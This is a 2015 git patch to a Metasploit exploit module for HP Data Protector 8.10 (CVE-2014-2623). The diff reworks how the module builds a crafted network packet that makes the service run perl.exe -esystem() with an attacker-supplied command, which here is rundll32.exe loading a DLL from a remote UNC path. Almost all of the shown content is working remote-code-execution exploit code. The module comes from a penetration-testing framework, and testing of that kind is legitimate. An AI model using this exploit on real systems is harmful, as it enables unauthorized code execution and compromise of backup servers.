From 62dde22d88d04d5c64937cfb1ed08ac6cc67e118 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Wed, 4 Mar 2015 12:27:58 -0600
Subject: [PATCH] Clean packet building

---
 .../misc/hp_dataprotector_dll_cmd_exec.rb     | 29 ++++++++++---------
 1 file changed, 15 insertions(+), 14 deletions(-)

diff --git a/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb
index 6e6cef1673..62ccc45fbd 100644
--- a/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb
@@ -26,8 +26,9 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'     =>
         [
           ['CVE', '2014-2623'],
+          ['OSVDB', '109069'],
           ['EDB', '34066'],
-          ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818'],
+          ['URL', 'https://h20564.www2.hp.com/hpsc/doc/public/display?docId=emr_na-c04373818']
         ],
       'DefaultOptions' =>
         {
@@ -37,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Platform'       => 'win',
       'Targets'        =>
         [
-          [ 'HP Data Protector 8.10', { 'Offset' => 46 } ],
+          [ 'HP Data Protector 8.10 / Windows', { } ],
         ],
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Nov 02 2014'))
@@ -90,21 +91,21 @@ class Metasploit3 < Msf::Exploit::Remote
     Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last null
   end
 
-  def exec_bar(cmd)
+  def send_pkt(cmd)
     cmd.gsub!("\\", "\\\\\\\\")
 
-    cmd_no = target['Offset'] + cmd.length
-
-    pkt = "\x00\x00\x00"
-    pkt << cmd_no
-    pkt << "\x32\x00\x01\x01\x01\x01\x01\x01\x00\x01\x00\x01"
-    pkt << "\x00\x01\x00\x01\x01\x00\x20\x32\x38\x00\x5c\x70"
-    pkt << "\x65\x72\x6c\x2e\x65\x78\x65\x00\x20\x2d\x65\x73\x79\x73\x74\x65\x6d" # perl -e system('cmd')
-    pkt << "('#{cmd}')" # Executable
-    pkt << "\x00"
+    pkt = "2\x00"
+    pkt << "\x01\x01\x01\x01\x01\x01\x00"
+    pkt << "\x01\x00"
+    pkt << "\x01\x00"
+    pkt << "\x01\x00"
+    pkt << "\x01\x01\x00 "
+    pkt << "28\x00"
+    pkt << "\\perl.exe\x00 "
+    pkt << "-esystem('#{cmd}')\x00"
 
     connect
-    sock.put(pkt)
+    sock.put([pkt.length].pack('N') + pkt)
     disconnect
   end
 
@@ -114,6 +115,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status("#{peer} - Trying to execute remote DLL...")
     sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
-    exec_bar(sploit)
+    send_pkt(sploit)
   end
 end